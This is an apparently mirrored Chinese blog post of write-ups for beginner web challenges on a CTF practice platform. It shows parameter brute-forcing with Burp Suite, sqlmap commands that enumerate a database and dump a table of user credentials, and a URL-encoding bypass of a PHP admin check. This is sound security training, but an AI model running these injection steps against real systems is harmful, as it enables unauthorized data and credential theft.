首页 > 其他分享 >攻防世界 WEB 方向难度一全解

攻防世界 WEB 方向难度一全解

时间:2022-12-01 08:33:22浏览次数:55  
标签:sqlmap WEB http 攻防 -- cyber XXXXXX 一全解 id

ics-06

云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。

只有一个报表中心能点,点进去之后发现 URL 后面跟了一个 id 参数,抓包导入 BurpSuite 爆破,发现第 2333 个请求带有 flag

inget

无描述

网页提示 Please enter ID,and Try to bypass,结合题目在 URL 后面跟 id 参数,然并卵,尝试 SQL 注入。用 SQLMap 自动注入

sqlmap -u "http://XXXXXX:XXXXX/?id=1" --dbs # 获取所有数据库,数据库名为 cyber
sqlmap -u "http://XXXXXX:XXXXX/?id=1" -D 'cyber' --tables # 获取所有表,表名也是 cyber
sqlmap -u "http://XXXXXX:XXXXX/?id=1" -D 'cyber' -T 'cyber' --columns # 获取所有字段,分别有 user、Id、pw
sqlmap -u "http://XXXXXX:XXXXX/?id=1" -D 'cyber' -T 'cyber' -C 'user,Id,pw' --dump # dump 所有内容

PHP2

无描述

网页提示 Can you anthenticate to this website?,通过 index.phps 看到 php 源码

<?php
	if("admin"===$_GET[id]) {
  	echo("<p>not allowed!</p>");
  	exit();
	}

	$_GET[id] = urldecode($_GET[id]);
	if($_GET[id] == "admin")
	{
  	echo "<p>Access granted!</p>";
  	echo "<p>Key: xxxxxxx </p>";
	}
?>

id 不能直接明文为 admin,会直接触发 exit(),需要 URL 编码之后再提交。字母和数字的 URL 编码方式: 对应的 ASCII 码 -> 十六进制 -> 加上百分号

标签:sqlmap,WEB,http,攻防,--,cyber,XXXXXX,一全解,id
From: https://www.cnblogs.com/azwhikaru/p/16940339.html

相关文章

  • 攻防世界题集 WEB 新手练习区全解
    view_sourceX老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。Ctrl+U,或者在网址前面加上view-source:就可以打开源代码了get_postX老......
  • JavaWeb项目练习(学生选课管理系统)一
    打算做一个选课管理系统,作为期末的复习。上需求2.1页面要求(1)系统可以通过浏览器直接访问;(1分)(2)各个功能页面整体风格统一;(2分)(3)首页为用户登录页面,管理员、教师、学生三......
  • 实验四 Web服务器2
    任务详情基于华为鲲鹏云服务器CentOS中(或Ubuntu),使用LinuxSocket实现:Web服务器的客户端服务器,提交程序运行截图实现GET即可,请求,响应要符合HTTP协议规范服务器部署到华......
  • 实验四 Web服务器1-socket编程
    任务详情基于华为鲲鹏云服务器CentOS中(或Ubuntu),使用LinuxSocket实现:time服务器的客户端服务器,提交程序运行截图echo服务器的客户端服务器,提交程序运行截图,服务器把客......
  • js获取内(外)网真实IP地址(WebRTC)及内网端口扫描
    摘要:使用的属性来发送数据内容接受的地址接受内网的参数接受内网开放端口的参数如果想获取真实的外网,请把下一行改为遍历内网及端口,这里只写了端口,多个端口,速度将会的非常......
  • 实验四-Web服务器2
    一、任务详情基于华为鲲鹏云服务器CentOS中(或Ubuntu),使用LinuxSocket实现:1.Web服务器的客户端服务器,提交程序运行截图2.实现GET即可,请求,响应要符合HTTP协议规范3.服务......
  • tomcat_动态java项目的目录结构以及与IDEA集成&创建web项目
    tomcat_动态java项目的目录结构静态项目和动态项目:目录结构:java动态的目录结构:项目的根目录WEB-INF目录......
  • 2021SWPUCTF-WEB(二)
    ez_unserialize​不知道在哪,御剑扫叭​有一个robots.txt​​一道反序列化好像是分析代码应该是admin=admin、passwd=ctf即可输出flag<?phpclasswllm{publi......
  • Web前端开发:前端简介与HTML协议
    目录前端一、前端与后端的概念1.前端的概念2.后端的概念3.了解前端的目的二、Web前端开发三大技术组成部分1.HTML超文本标记语言2.CSS是层叠样式表3.JavaScript网页脚本语......
  • 实验四 Web服务器2
    实验四Web服务器2基于华为鲲鹏云服务器CentOS中(或Ubuntu),使用LinuxSocket实现:Web服务器的客户端服务器,提交程序运行截图实现GET即可,请求,响应要符合HTTP协议规范服务......